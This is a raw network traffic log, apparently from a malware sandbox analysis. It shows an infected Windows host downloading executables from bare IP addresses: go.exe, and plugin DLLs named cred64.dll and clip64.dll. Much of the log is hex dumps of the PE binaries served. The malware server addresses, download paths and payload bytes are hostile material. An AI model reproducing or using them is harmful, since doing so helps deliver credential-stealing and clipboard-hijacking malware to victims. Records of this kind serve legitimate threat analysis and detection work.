Jan 18, 2024 00:34:20.214787960 CET	1286	IN	Data Raw: 45 17 ab ff 82 68 61 e8 7b 3f db 22 ec 69 74 8e 31 13 19 9e ee 77 ac c0 bd 61 61 9d 48 b8 68 ce 01 c5 68 6b 40 e8 da 03 06 24 0a 34 8f 52 d8 b9 c4 a8 8a 3c eb d2 c9 80 bd 07 83 8c ed c1 bd 06 63 2d 53 f9 a2 7d 1f be d3 2a a7 30 8f 6d 2c df 93 ae Data Ascii: Eha{?"it1waaHhhk@$4R<c-S}0m,:{0f]+j9aa039QJUh hw\|z?!,.O$(Z=T YpQQY8G!\(YkV'<5iPu4gIC
Jan 18, 2024 00:34:20.214802027 CET	1286	IN	Data Raw: 8c d7 a2 26 6b c9 89 20 d6 b0 36 d8 e9 eb 28 b4 6d a7 4f 25 44 23 c9 bf 40 b5 96 14 ae 31 4a ae 72 25 ff af b6 44 4b 3b b5 cc ed 88 4d 33 d2 43 5c 4b b6 ff c6 aa b1 13 08 34 e5 79 47 a2 f5 84 31 ff 68 8c e3 59 af ac 44 0d 8f 56 39 c2 25 53 c2 bd Data Ascii: &k 6(mO%D#@1Jr%DK;M3C\K4yG1hYDV9%S~j9$3qpiz(6m`b.C-Hr_\|Sbq+ndT' >SN{Au$\|/g=?A6oezq,NgJSd?@3aiGz('}
Jan 18, 2024 00:34:20.453197956 CET	1286	IN	Data Raw: 99 51 37 11 a7 c3 bd f2 08 7c 59 9f 1d 90 01 e9 56 3e 57 f3 10 65 d0 50 c4 12 20 29 99 b5 bb e8 2d 2f d8 da 8f 07 20 16 9d bc da 5b b3 8a d7 20 be 7b 32 48 28 82 01 17 eb b9 2a 1a 13 2f 51 98 28 78 52 a9 58 19 25 a0 b1 4f e7 78 2e a7 bc 1b ea 68 Data Ascii: Q7\|YV>WeP )-/ [ {2H(/Q(xRX%Ox.h\(z9^r\[Y3YXD\|h?+[);)C\<rkS k=AB uevraoi'dg'U'/"}>9_:c<'a>[fK

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:34:29.253756046 CET	219	OUT	HEAD /cost/go.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 109.107.182.3 Cache-Control: no-cache
Jan 18, 2024 00:34:29.453829050 CET	267	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:34:29 GMT Content-Type: application/octet-stream Content-Length: 916480 Last-Modified: Thu, 18 Jan 2024 07:20:25 GMT Connection: keep-alive ETag: "65a8d139-dfc00" Accept-Ranges: bytes
Jan 18, 2024 00:34:29.454586983 CET	218	OUT	GET /cost/go.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.36 Host: 109.107.182.3 Cache-Control: no-cache
Jan 18, 2024 00:34:29.647727013 CET	1286	IN	Data Raw: 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00 e8 83 f0 01 00 59 c3 e8 e6 de 01 00 68 f8 23 44 00 e8 72 f0 01 00 59 c3 e8 59 3c 00 00 68 fd 23 44 00 e8 61 f0 01 00 59 c3 51 e8 a9 00 00 00 68 02 24 Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY%Mh?$DYVNNj(VYY
Jan 18, 2024 00:34:29.647835970 CET	1286	IN	Data Raw: ec 53 8b d9 56 57 80 7b 0d 00 8b 7b 08 75 29 8b 45 08 8b cf 8b 30 e8 7e b5 00 00 89 37 c7 47 0c 01 00 00 00 8b 43 08 80 7b 0d 00 5f 5e 5b 75 0d c6 40 10 00 5d c2 08 00 8b 7f 38 eb d2 8b 40 38 eb ee 33 c0 c7 05 80 18 4d 00 64 00 00 00 33 c9 66 a3 Data Ascii: SVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj8M<M@MPMfMMMXMDMHMLMUWrVj@YuON8w^_]UVuWVgFO
Jan 18, 2024 00:34:29.647874117 CET	1286	IN	Data Raw: 8d 45 ec 43 89 7d ec 50 8d 8d 6c ff ff ff 89 5d fc 47 e8 ed 03 00 00 8b 85 70 ff ff ff 89 45 c0 8b 55 f8 e9 8a fe ff ff 8b 41 04 6a 7f 59 66 39 48 08 0f 85 bc 05 04 00 8b 45 fc 48 4f 83 bd 6c ff ff ff 00 89 45 fc 0f 84 83 03 04 00 80 bd 75 ff ff Data Ascii: EC}Pl]GpEUAjYf9HEHOlEuE{lepEE;&r8EE}TPGZEHXE!#AjYf9HmME@E0
Jan 18, 2024 00:34:29.647979021 CET	1286	IN	Data Raw: 56 8b cf e8 71 07 00 00 59 50 56 8b cf e8 77 16 00 00 5f 5e c9 c2 10 00 55 8b ec 83 ec 74 53 56 33 db 8d 4d 94 57 89 5d 90 e8 14 7b 00 00 ff 75 08 8d 4d 90 c7 45 a4 34 cc 49 00 89 5d a8 89 5d ac 89 5d b0 88 5d b4 e8 78 1c 00 00 8b 4d 0c be 18 14 Data Ascii: VqYPVw_^UtSV3MW]{uME4I]]]]xMMEhIM'nj5MM]]]& ]MiVMzEPM@hIMmSjEPEP/yMihtIME]Em
Jan 18, 2024 00:34:29.648051977 CET	1286	IN	Data Raw: c9 c2 04 00 83 c8 ff eb f4 41 eb da 55 8b ec 83 e4 f8 81 ec bc 03 00 00 53 56 57 68 b4 03 00 00 33 db c7 44 24 14 a8 03 00 00 8d 44 24 18 8b f1 53 50 e8 de ea 01 00 83 c4 0c 39 9e 98 01 00 00 75 0b a1 e4 13 4d 00 89 86 98 01 00 00 39 9e a4 01 00 Data Ascii: AUSVWh3D$D$SP9uM9uM9uMSW[Md$$D$F@D$D$D$ qD$$=hMD$PjIhM_^
Jan 18, 2024 00:34:29.648181915 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:34:29 GMT Content-Type: application/octet-stream Content-Length: 916480 Last-Modified: Thu, 18 Jan 2024 07:20:25 GMT Connection: keep-alive ETag: "65a8d139-dfc00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 39 d1 a8 65 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 4c 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 b8 4e 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 40 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 90 00 00 00 40 0d 00 00 92 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 86 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL9e"Lw@`N@@@d\|@@u4@.text `.rdata@@.datalpH@.rsrc@@@@.relocuv@B
Jan 18, 2024 00:34:29.648222923 CET	1286	IN	Data Raw: 85 c9 0f 85 6b 10 04 00 8b 4f d4 85 c9 0f 85 75 10 04 00 33 db 89 5f dc 8b 4f c4 85 c9 0f 85 e3 01 00 00 8d 4f a4 89 5f cc e8 60 83 00 00 8d 8f 80 fe ff ff e8 0a 04 00 00 8d b7 64 fe ff ff 8b ce c7 06 3c c9 49 00 e8 88 02 00 00 ff 76 04 e8 bf e8 Data Ascii: kOu3_OO_`d<IvY\|#l)\DItvL@IY9TPTX<@IY9D@D.,@IY9
Jan 18, 2024 00:34:29.648261070 CET	1286	IN	Data Raw: 50 8d 45 f8 c7 45 f8 01 00 00 00 50 57 8b f1 e8 4e 00 00 00 85 c0 78 38 8b 4f 04 8b 45 f8 8b 04 81 66 83 78 08 7f 0f 85 33 08 04 00 80 7d ff 00 8d 8e 64 01 00 00 75 1e 80 be 6d 01 00 00 00 8b 8e 68 01 00 00 75 16 8b 49 04 8b 45 0c 41 89 08 5f 5e Data Ascii: PEEPWNx8OEfx3}dumhuIEA_^I0UeEeVEVPuuxMM3M^At)ttH9AxUSV
Jan 18, 2024 00:34:29.648298025 CET	1286	IN	Data Raw: d2 33 c0 40 89 51 10 89 41 1c 89 51 18 89 41 2c 8b c1 89 51 20 89 51 28 c3 55 8b ec 8b 45 08 85 c0 0f 8f 88 01 04 00 83 7d 0c 00 0f 85 a9 01 04 00 83 7d 10 00 75 34 83 7d 14 00 0f 85 b8 01 04 00 83 7d 18 00 0f 85 b7 01 04 00 83 7d 1c 00 0f 85 b6 Data Ascii: 3@QAQA,Q Q(UE}}u4}}}} u}$~3] jjwsjjsjUVF}^W3jZQL>3YNF~F<BN$;\|SA23~,FDMEuNG
Jan 18, 2024 00:34:29.648402929 CET	1286	IN	Data Raw: 6a 08 8b f1 e8 ad ca 01 00 8b 55 08 59 8b c8 8b 12 83 61 04 00 89 11 83 7e 04 00 75 0d 89 4e 04 ff 06 89 4e 08 5e 5d c2 04 00 8b 46 08 89 48 04 eb ee 55 8b ec b8 04 00 01 00 e8 ec eb 03 00 56 8d 45 fc 8b f2 50 8d 85 fc ff fe ff 50 68 ff 7f 00 00 Data Ascii: jUYa~uNN^]FHUVEPPh1hIEt3fP7^VVYtf\|F\u3fLF^UVW3FO;Qu_^]USVWueYN3C;F
Jan 18, 2024 00:34:29.848248959 CET	1286	IN	Data Raw: 6a 10 53 e8 94 c0 01 00 83 c4 0c 8b de 85 f6 75 e5 5e 8b 4f 4c 33 db 85 c9 74 0d 8d 41 fc 39 18 74 44 8b 01 6a 03 ff 10 ff 77 14 e8 b3 c0 01 00 59 8d 4f 18 89 5f 08 89 5f 0c 89 5f 10 89 5f 14 89 5f 4c 66 89 1f e8 64 2a 00 00 8d 4f 28 e8 7a da ff Data Ascii: jSu^OL3tA9tDjwYO_____Lfd*O(z9_XOP_[>PwYUS]EVWhA@~7jV&tQWYY_^[]VWj^$MZu MMrZMh
Jan 18, 2024 00:34:29.849160910 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:34:29 GMT Content-Type: application/octet-stream Content-Length: 916480 Last-Modified: Thu, 18 Jan 2024 07:20:25 GMT Connection: keep-alive ETag: "65a8d139-dfc00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 39 d1 a8 65 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 4c 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 b8 4e 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 40 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 40 90 00 00 00 40 0d 00 00 92 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 86 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL9e"Lw@`N@@@d\|@@u4@.text `.rdata@@.datalpH@.rsrc@@@@.relocuv@B

Timestamp	Bytes transferred	Direction	Data
Jan 18, 2024 00:34:53.271512985 CET	64	OUT	GET /theme/Plugins/cred64.dll HTTP/1.1 Host: 185.215.113.68
Jan 18, 2024 00:34:53.503695965 CET	326	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:34:53 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
Jan 18, 2024 00:34:53.637270927 CET	64	OUT	GET /theme/Plugins/clip64.dll HTTP/1.1 Host: 185.215.113.68
Jan 18, 2024 00:34:53.870337009 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Wed, 17 Jan 2024 23:34:53 GMT Content-Type: application/octet-stream Content-Length: 104448 Last-Modified: Thu, 04 Jan 2024 19:50:16 GMT Connection: keep-alive ETag: "65970bf8-19800" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 68 d6 96 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 0e 01 00 00 92 00 00 00 00 00 00 21 67 00 00 00 10 00 00 00 20 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 01 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 7a 01 00 9c 00 00 00 3c 7b 01 00 50 00 00 00 00 b0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 01 00 00 13 00 00 b0 6f 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 6f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 48 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 56 0c 01 00 00 10 00 00 00 0e 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a0 62 00 00 00 20 01 00 00 64 00 00 00 12 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 04 17 00 00 00 90 01 00 00 0c 00 00 00 76 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 b0 01 00 00 02 00 00 00 82 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 13 00 00 00 c0 01 00 00 14 00 00 00 84 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$'cjcjcj8iij8oj8nqjnljirjoBj8kdjckjc`jjbjbjhbjRichcjPELhe!!g @z<{Po8o@ H.textV `.rdatab d@@.datav@.rsrc@@.reloc@B
Jan 18, 2024 00:34:53.870451927 CET	1286	IN	Data Raw: 00 00 00 00 00 6a 20 68 e8 6c 01 10 b9 70 98 01 10 e8 df 48 00 00 68 00 16 01 10 e8 ad 53 00 00 59 c3 cc cc cc 6a 20 68 0c 6d 01 10 b9 88 98 01 10 e8 bf 48 00 00 68 60 16 01 10 e8 8d 53 00 00 59 c3 cc cc cc 6a 14 68 30 6d 01 10 b9 a0 98 01 10 e8 Data Ascii: j hlpHhSYj hmHh`SYjh0mHhmSYjhHmHh MSYjham_Hh-SYjham?HhSYjhamHh@RYjham
Jan 18, 2024 00:34:53.870583057 CET	1286	IN	Data Raw: 00 00 51 57 e8 58 4b 00 00 83 c4 08 8b 55 98 83 fa 10 72 2c 8b 4d 84 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 64 02 00 00 52 51 e8 24 4b 00 00 83 c4 08 8b 45 fc c6 84 05 80 fb ff ff 00 8d 45 fc 50 68 ff 03 Data Ascii: QWXKUr,MBrI#+dRQ$KEEPhPV<!]V5@!uuEUE~EfCEEr/MBrI#+RQJEEEEr.
Jan 18, 2024 00:34:53.870636940 CET	1286	IN	Data Raw: 00 00 c6 45 e0 00 e8 de 3e 00 00 8d 45 e0 8b d7 50 8d 4d c8 e8 10 40 00 00 8b d8 83 c4 04 3b fb 74 65 8b 4f 14 83 f9 10 72 2b 8b 07 41 81 f9 00 10 00 00 72 16 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 cd 00 00 00 8b c2 51 50 e8 09 46 00 00 Data Ascii: E>EPM@;teOr+ArP#+QPFGG~CfGCCUr(MBrI#+wiRQEUEEEr(MBrI#+w'RQe
Jan 18, 2024 00:34:53.870727062 CET	1286	IN	Data Raw: be 04 18 8b 04 81 83 f8 ff 74 27 c1 e6 06 03 f0 83 c7 06 78 18 8b cf 8b c6 d3 f8 8b 4d f4 50 e8 af 35 00 00 8b 55 ec 83 ef 08 8b 4d f8 43 3b da 72 c2 8b 45 f8 85 c0 74 0e 68 00 04 00 00 50 e8 11 41 00 00 83 c4 08 8b 55 f0 83 fa 10 72 28 8b 4d dc Data Ascii: t'xMP5UMC;rEthPAUr(MBrI#+wVRQ@UEEEr(MBrI#+wRQ@E_^[]fUESV3WCC
Jan 18, 2024 00:34:53.870810032 CET	1286	IN	Data Raw: c1 0f 42 c8 83 7d 1c 10 8d 45 08 0f 43 45 08 51 03 c7 8d 4d e8 50 e8 c2 34 00 00 83 ec 18 8d 45 d0 8b cc 50 e8 f4 33 00 00 83 ec 18 8d 45 e8 8b f4 83 ec 18 8b cc 50 e8 e1 33 00 00 8b ce e8 aa fe ff ff 83 c4 18 e8 a2 fc ff ff 8b 55 fc 83 c4 30 85 Data Ascii: B}ECEQMP4EP3EP3U0r,MBrI#+RQ;EG;HUr(MBrI#+wxRQ;Ur^MBrFI#+wH4
Jan 18, 2024 00:34:53.870934963 CET	1286	IN	Data Raw: 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 c4 15 00 00 52 51 e8 2b 37 00 00 83 c4 08 0f 10 45 d0 8b 75 e0 8d 45 e8 83 ec 18 0f 11 45 e8 8b cc f3 0f 7e 45 e0 50 66 0f d6 45 f8 e8 d3 2e 00 00 83 ec 18 8b cc 6a 03 68 5c 6e 01 10 c7 41 Data Ascii: rI#+RQ+7EuEE~EPfE.jh\nAAq/\|0EEEHE;H+;B}ECEMVP+/r.ArP#+QPg6E
Jan 18, 2024 00:34:53.870989084 CET	1286	IN	Data Raw: 00 72 16 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 be 10 00 00 8b c2 51 50 e8 23 32 00 00 83 c4 08 0f 10 45 d0 8b 55 e0 83 ec 18 8b cc b8 a8 99 01 10 0f 11 05 a8 99 01 10 f3 0f 7e 45 e0 66 0f d6 05 b8 99 01 10 c7 41 10 00 00 00 00 c7 41 14 Data Ascii: rP#+QP#2EU~EfAA9B=RCPV*M>t\|r.ArP#+QP}1~F
Jan 18, 2024 00:34:53.871102095 CET	1286	IN	Data Raw: 16 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 9c 0b 00 00 8b c2 51 50 e8 1f 2d 00 00 83 c4 08 c7 05 d0 99 01 10 00 00 00 00 c7 05 d4 99 01 10 0f 00 00 00 c6 05 c0 99 01 10 00 0f 10 06 0f 11 05 c0 99 01 10 f3 0f 7e 46 10 66 0f d6 05 d0 99 01 Data Ascii: P#+QP-~FfFFUr,MBrI#+#RQ,uEPb$jhtnAA%0EEEHE;
